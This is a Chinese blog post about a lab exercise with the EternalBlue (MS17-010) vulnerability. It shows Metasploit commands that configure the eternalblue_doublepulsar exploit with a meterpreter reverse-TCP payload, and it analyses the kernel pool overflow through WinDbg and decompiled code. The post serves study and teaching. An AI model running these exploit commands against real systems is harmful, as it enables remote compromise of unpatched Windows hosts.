<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/BLACK.jpg">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/BLACK.jpg">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/BLACK.jpg">
  <link rel="mask-icon" href="/images/BLACK.jpg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"./public/search.xml"};
  </script>

  <meta name="description" content="第一次使用metasploit工具，并利用了windbg进行内核分析">
<meta property="og:type" content="article">
<meta property="og:title" content="永恒之蓝漏洞利用">
<meta property="og:url" content="http://example.com/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/index.html">
<meta property="og:site_name" content="Hyacinthum">
<meta property="og:description" content="第一次使用metasploit工具，并利用了windbg进行内核分析">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210409164440462.png">
<meta property="og:image" content="http://example.com/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210409165111377.png">
<meta property="og:image" content="http://example.com/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210409165351985.png">
<meta property="og:image" content="http://example.com/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210409165555421.png">
<meta property="og:image" content="http://example.com/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210409170017784.png">
<meta property="og:image" content="http://example.com/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210418153938467.png">
<meta property="og:image" content="http://example.com/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210418153907477.png">
<meta property="og:image" content="http://example.com/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210418155226658.png">
<meta property="og:image" content="http://example.com/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210418155424536.png">
<meta property="og:image" content="http://example.com/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210418165945612.png">
<meta property="og:image" content="http://example.com/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210419193033970.png">
<meta property="og:image" content="http://example.com/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210419193146430.png">
<meta property="article:published_time" content="2021-04-06T08:50:31.000Z">
<meta property="article:modified_time" content="2021-10-14T00:29:16.437Z">
<meta property="article:author" content="Hyacinthum">
<meta property="article:tag" content="metasploit">
<meta property="article:tag" content="windows kernal">
<meta property="article:tag" content="windbg">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210409164440462.png">

<link rel="canonical" href="http://example.com/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>永恒之蓝漏洞利用 | Hyacinthum</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="Hyacinthum" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Hyacinthum</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">昼短苦夜长，何不秉烛游</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/WHITE.jpg">
      <meta itemprop="name" content="Hyacinthum">
      <meta itemprop="description" content="昼短苦夜长，何不秉烛游">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hyacinthum">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          永恒之蓝漏洞利用
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-04-06 16:50:31" itemprop="dateCreated datePublished" datetime="2021-04-06T16:50:31+08:00">2021-04-06</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-10-14 08:29:16" itemprop="dateModified" datetime="2021-10-14T08:29:16+08:00">2021-10-14</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><strong>第一次使用metasploit工具，并利用了windbg进行内核分析</strong></p>
<a id="more"></a>

<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/r250414958/article/details/84887574">https://blog.csdn.net/r250414958/article/details/84887574</a></p>
<p><a target="_blank" rel="noopener" href="https://ti.qianxin.com/blog/articles/detailed-analysis-of-eternalblue/#:~:text=SMB_COM_NT_TRANSACT%3A,%E7%94%A8%E4%BA%8E%E6%89%93%E5%BC%80%E6%88%96%E5%88%9B%E5%BB%BA%E4%B8%80%E4%B8%AA%E6%96%87%E4%BB%B6%E6%88%96%E6%96%87%E4%BB%B6%E5%A4%B9%EF%BC%8C%E5%B9%B6%E5%BA%94%E7%94%A8%E6%89%A9%E5%B1%95%E5%B1%9E%E6%80%A7EA%E6%88%96%E5%AE%89%E5%85%A8%E6%8F%8F%E8%BF%B0%E7%AC%A6SD%20%E5%85%B6%E4%B8%AD%E4%BA%A7%E7%94%9F%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%8D%B3%E4%B8%BA%E5%AF%B9%E5%BA%94%E7%9A%84SMB_COM_TRANSACTION2%E5%91%BD%E4%BB%A4%E3%80%82">https://ti.qianxin.com/blog/articles/detailed-analysis-of-eternalblue/#:~:text=SMB_COM_NT_TRANSACT%3A,%E7%94%A8%E4%BA%8E%E6%89%93%E5%BC%80%E6%88%96%E5%88%9B%E5%BB%BA%E4%B8%80%E4%B8%AA%E6%96%87%E4%BB%B6%E6%88%96%E6%96%87%E4%BB%B6%E5%A4%B9%EF%BC%8C%E5%B9%B6%E5%BA%94%E7%94%A8%E6%89%A9%E5%B1%95%E5%B1%9E%E6%80%A7EA%E6%88%96%E5%AE%89%E5%85%A8%E6%8F%8F%E8%BF%B0%E7%AC%A6SD%20%E5%85%B6%E4%B8%AD%E4%BA%A7%E7%94%9F%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%8D%B3%E4%B8%BA%E5%AF%B9%E5%BA%94%E7%9A%84SMB_COM_TRANSACTION2%E5%91%BD%E4%BB%A4%E3%80%82</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_27446553/article/details/73480807?utm_medium=distribute.pc_relevant.none-task-blog-2~default~BlogCommendFromMachineLearnPai2~default-2.control&amp;dist_request_id=&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~BlogCommendFromMachineLearnPai2~default-2.control">https://blog.csdn.net/qq_27446553/article/details/73480807?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-2.control&amp;dist_request_id=&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-2.control</a></p>
<p>渗透靶场、exploit脚本</p>
<h2 id="利用MSF框架进行简单攻击"><a href="#利用MSF框架进行简单攻击" class="headerlink" title="利用MSF框架进行简单攻击"></a>利用MSF框架进行简单攻击</h2><p>攻击机：Kali系统   </p>
<p>目标机1：Win7 x86   192.168.171.141</p>
<p>目标机2：Win7 x64   192.168.171.141</p>
<p>调用nmap对目标机1的端口进行扫描，发现了445端口</p>
<img src="/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210409164440462.png" alt="image-20210409164440462" style="zoom:67%;">

<p>输入<code>msfconsole</code>启动metasploit，查找ms17有关的模块</p>
<p><img src="/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210409165111377.png" alt="image-20210409165111377"></p>
<p>使用<code>smb_ms17_010</code>模块检测目标机是否含有漏洞</p>
<p><img src="/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210409165351985.png" alt="image-20210409165351985"></p>
<p>使用<code>ms17_010_psexec</code>模块获取目标机权限</p>
<p><img src="/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210409165555421.png" alt="image-20210409165555421"></p>
<p>查看目标机ip，与之前一致</p>
<img src="/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210409170017784.png" alt="image-20210409170017784" style="zoom:67%;">

<h3 id="漏洞原理分析"><a href="#漏洞原理分析" class="headerlink" title="漏洞原理分析"></a>漏洞原理分析</h3><p>该漏洞出现在Windows的SMB服务（服务器消息块协议，用于共享文件等），SMB服务使用IP地址访问时，使用445端口。</p>
<p>对目标机2（32位win7）采用以下攻击（32位的win7攻击模块需要自行配置）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">msf &gt; use exploit/windows/smb/eternalblue_doublepulsar </span><br><span class="line">msf exploit(windows/smb/eternalblue_doublepulsar) &gt; <span class="built_in">set</span> lhost 192.168.171.134   </span><br><span class="line">msf exploit(windows/smb/eternalblue_doublepulsar) &gt; <span class="built_in">set</span> payload windows/meterpreter/reverse_tcp</span><br><span class="line">msf exploit(windows/smb/eternalblue_doublepulsar) &gt; <span class="built_in">set</span> rhost 192.168.171.143    </span><br><span class="line">msf exploit(windows/smb/eternalblue_doublepulsar) &gt; <span class="built_in">set</span> processinject explorer.exe </span><br><span class="line">msf exploit(windows/smb/eternalblue_doublepulsar) &gt; run</span><br></pre></td></tr></table></figure>

<p>需要使用windbg对目标机2进行调试</p>
<p>安装后门前的表</p>
<img src="/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210418153938467.png" alt="image-20210418153938467" style="zoom:67%;">

<p>安装后门后的表</p>
<img src="/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210418153907477.png" alt="image-20210418153907477" style="zoom:67%;">





<p>下一个硬件断点<code>ba e1 0xFFDFF1F1</code>命中断点，查看堆栈，栈顶即是返回地址</p>
<img src="/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210418155226658.png" alt="image-20210418155226658" style="zoom:67%;">

<p>查到了是来自srvnet.sys模块的!SrvNetCommonReceiveHandler+0x94</p>
<p><img src="/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210418155424536.png" alt="image-20210418155424536"></p>
<p>查看一下调用堆栈，可以追溯到SrvNetWskReceiveComplete+0x72</p>
<p><img src="/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210418165945612.png" alt="image-20210418165945612"></p>
<h4 id="关键漏洞分析"><a href="#关键漏洞分析" class="headerlink" title="关键漏洞分析"></a>关键漏洞分析</h4><p>CVE-2017-0144，可引发内存越界写，通过SMB协议的命令SMB_COM_TRANSACTION2触发，该命令会将数据包中的FEA_LIST转换为NTFEA_LIST，漏洞出现在函数SrvOs2FeaListToNt，该函数会调动函数SrvOs2FeaListSizeToNt计算FEA_LIST长度</p>
<p>SrvOs2FeaListSizeToNt函数中会将WORD型数据拷贝到DWORD中，只要原变量初始值大于FFFF，就可以伪造长度更长的长度，通过这一漏洞，攻击者可以伪造超长的FEA_LIST。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> __stdcall <span class="title">SrvOs2FeaListSizeToNt</span><span class="params">(_DWORD *a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  _WORD *v1; <span class="comment">// eax@1</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v2; <span class="comment">// edi@1</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v3; <span class="comment">// esi@1</span></span><br><span class="line">  <span class="keyword">int</span> v4; <span class="comment">// ebx@3</span></span><br><span class="line">  <span class="keyword">int</span> v6; <span class="comment">// [sp+Ch] [bp-4h]@1</span></span><br><span class="line"></span><br><span class="line">  v1 = a1;                     <span class="comment">//*********</span></span><br><span class="line">  v6 = <span class="number">0</span>;</span><br><span class="line">  v2 = (<span class="keyword">unsigned</span> <span class="keyword">int</span>)a1 + *a1;</span><br><span class="line">  v3 = (<span class="keyword">unsigned</span> <span class="keyword">int</span>)(a1 + <span class="number">1</span>);</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> <span class="keyword">int</span>)(a1 + <span class="number">1</span>) &lt; v2 )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">while</span> ( v3 + <span class="number">4</span> &lt; v2 )</span><br><span class="line">    &#123;</span><br><span class="line">      v4 = *(_WORD *)(v3 + <span class="number">2</span>) + *(_BYTE *)(v3 + <span class="number">1</span>);</span><br><span class="line">      <span class="keyword">if</span> ( v4 + v3 + <span class="number">4</span> + <span class="number">1</span> &gt; v2 )</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">if</span> ( RtlSizeTAdd(v6, (v4 + <span class="number">12</span>) &amp; <span class="number">0xFFFFFFFC</span>, &amp;v6) &lt; <span class="number">0</span> )</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">      v3 += v4 + <span class="number">5</span>;</span><br><span class="line">      <span class="keyword">if</span> ( v3 &gt;= v2 )</span><br><span class="line">        <span class="keyword">return</span> v6;</span><br><span class="line">      v1 = a1;</span><br><span class="line">    &#125;</span><br><span class="line">    *v1 = (_WORD)(v3 - v1);    <span class="comment">// ******</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> v6;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在对应处下断点，这里本来试图将FEALIST大小从00010000缩小到0000ff5d</p>
<p><img src="/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210419193033970.png" alt="image-20210419193033970"></p>
<p>但却被转换成0001ff5d，结构变大，导致在之后使用错误长度进行memmove，导致pool溢出，造成一次越界写</p>
<img src="/2021/04/06/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/image-20210419193146430.png" alt="image-20210419193146430" style="zoom:67%;">

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">SRVNET_BUFFER</span>&#123;</span></span><br><span class="line">	<span class="comment">//offset froom POOLHDR:0x10</span></span><br><span class="line">	USHORT flag; <span class="comment">//0</span></span><br><span class="line">	<span class="keyword">char</span> pad[<span class="number">2</span>]; </span><br><span class="line">	LIST_ENTRY <span class="built_in">list</span>; <span class="comment">//4</span></span><br><span class="line">	<span class="comment">//offset form SRVNET_BUFFER: 0x30</span></span><br><span class="line">	<span class="keyword">char</span> *pnetBuffer; <span class="comment">//0C</span></span><br><span class="line">	DWORD netbufSize; <span class="comment">//size of netBuffer 10h</span></span><br><span class="line">	DWORD ioStatusInfo; <span class="comment">//copy Value of IRP.IOStatus.Information 14h</span></span><br><span class="line">	<span class="comment">//offset from SRVNET_BUFFER:0x40</span></span><br><span class="line">	MDL *pMdll; <span class="comment">//at offset 0x2c 18h</span></span><br><span class="line">	DWORD nByteProcessed;  <span class="comment">//1ch</span></span><br><span class="line">	DWORD Len;    <span class="comment">//20h</span></span><br><span class="line">	<span class="comment">//offset from SRVNET_BUFFER:0x50</span></span><br><span class="line">	PVOID Connection; <span class="comment">//size of this smb packet (from user) 24h</span></span><br><span class="line">	DWORD unknown; <span class="comment">//28h</span></span><br><span class="line">	<span class="comment">//MDL content starts at 0x2c</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>越界写的关键是修改了srvnet_buffer对象的MDL和指向srvnet_recv的指针，之后的数据（即shellcode）可以通过tcp栈拷贝到MDL指定的内存，断开所有连接后最终会根据srvnet_recv寻址，最终会调用写入的shellcode</p>
<p>断开所有连接后最终会调到函数srvnet!SrvNetWskReceiveComplete，该函数会调用写入的shellcode</p>
<h4 id="漏洞利用1"><a href="#漏洞利用1" class="headerlink" title="漏洞利用1"></a>漏洞利用1</h4><p>关键漏洞要求发送的FEA LIST长度大于0x10000，但实际上FEA LIST存在于SMB_COM_TRANSACTION2命令中，发送一次该命令的数据包总长度最大值只能是FFFF，因此需要采用别的方法发送该命令</p>
<p>先发送一个SMB_COM_NT_TRANSACT，再发送多个SMB_COM_TRANSACTION2_SECONDARY命令，服务器接受到后会按照SMB_COM_TRANSACTION2处理</p>
<h4 id="漏洞利用2"><a href="#漏洞利用2" class="headerlink" title="漏洞利用2"></a>漏洞利用2</h4><p>永恒之蓝精细地构建了一系列连续的内存布局，这要求通过SMB协议远程稳定地申请并释放一段指定大小的pool内存，通过SMB_COM_SESSION_SETUP_ANDX命令实现。</p>
<p>该命令存在请求格式混淆的漏洞，在MS17-010补丁中未被修复，该漏洞可以使得服务端从错误的位置读取，创建一个指定大小的缓冲区，攻击者控制该缓冲区的连接断开后会形成一个大小可控的pool区域。</p>
<ul>
<li><p>分析永恒之蓝漏洞利用</p>
<ul>
<li><p>通过SMB_COM_TRANSACTION2命令触发内存越界写</p>
<p>在计算数据包中FEA_LIST长度时，会将单字拷贝到原双字数据中，攻击者可以借此伪造超长（大于等于0x10000）的FEA_LIST，在之后会使用错误长度进行memmove</p>
</li>
<li><p>构造长度大于FFFF的SMB_COM_TRANSACTION2命令</p>
<p>SMB_COM_TRANSACTION2命令数据包限长FFFF，而SMB_COM_NT_TRANSACT则可以发送大于FFFF的数据包。对于TRANSACTION指令，可以对指令进行拆分，后跟对应类型的_SECONDARY数据包，但实际上服务器端只会对最后一个 _SECONDARY包类型进行检查。</p>
<p>先发送SMB_COM_NT_TRANSACT数据包，后续发送一系列SMB_COM_TRANSACTION2_SECONDARY数据包，即可构造大于FFFF的SMB_COM_TRANSACTION2命令</p>
</li>
<li><p>构建内存布局，实现控制转移</p>
<p>控制转移通过修改SRVNET_BUFFER中MDL指针和指向SRVNET_RECV的指针实现，在断开所有连接后，会转移至servnet_recv结构指向的区域。</p>
<ul>
<li>申请多个SRVNET_BUFFER，可通过SMB 2协议产生，大小通过前4个字节控制</li>
<li>通过SMB_COM_SESSION_SETUP_ANDX命令的请求格式混淆漏洞，创建大小可控的pool内存区</li>
<li>继续申请SRVNET_BUFFER，确保与前者连续</li>
<li>断开第二步的连接，产生一个内存可控的内存空洞，后续紧跟一个SRVNET_BUFFER</li>
</ul>
</li>
</ul>
</li>
</ul>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/metasploit/" rel="tag"># metasploit</a>
              <a href="/tags/windows-kernal/" rel="tag"># windows kernal</a>
              <a href="/tags/windbg/" rel="tag"># windbg</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/03/23/wannacry%E5%8B%92%E7%B4%A2%E7%97%85%E6%AF%92%E5%88%86%E6%9E%90/" rel="prev" title="Wannacry勒索病毒分析">
      <i class="fa fa-chevron-left"></i> Wannacry勒索病毒分析
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/10/11/%E5%9B%9E%E5%BF%86%E5%9C%A8%E7%BB%93%E6%9D%9F%E4%B9%8B%E5%90%8E%E2%80%94%E2%80%94%E8%AE%B0%E5%BD%95%E4%BF%9D%E7%A0%94/" rel="next" title="回忆在结束之后——记录保研">
      回忆在结束之后——记录保研 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8MSF%E6%A1%86%E6%9E%B6%E8%BF%9B%E8%A1%8C%E7%AE%80%E5%8D%95%E6%94%BB%E5%87%BB"><span class="nav-number">1.</span> <span class="nav-text">利用MSF框架进行简单攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E5%88%86%E6%9E%90"><span class="nav-number">1.1.</span> <span class="nav-text">漏洞原理分析</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%85%B3%E9%94%AE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="nav-number">1.1.1.</span> <span class="nav-text">关键漏洞分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A81"><span class="nav-number">1.1.2.</span> <span class="nav-text">漏洞利用1</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A82"><span class="nav-number">1.1.3.</span> <span class="nav-text">漏洞利用2</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Hyacinthum"
      src="/images/WHITE.jpg">
  <p class="site-author-name" itemprop="name">Hyacinthum</p>
  <div class="site-description" itemprop="description">昼短苦夜长，何不秉烛游</div>
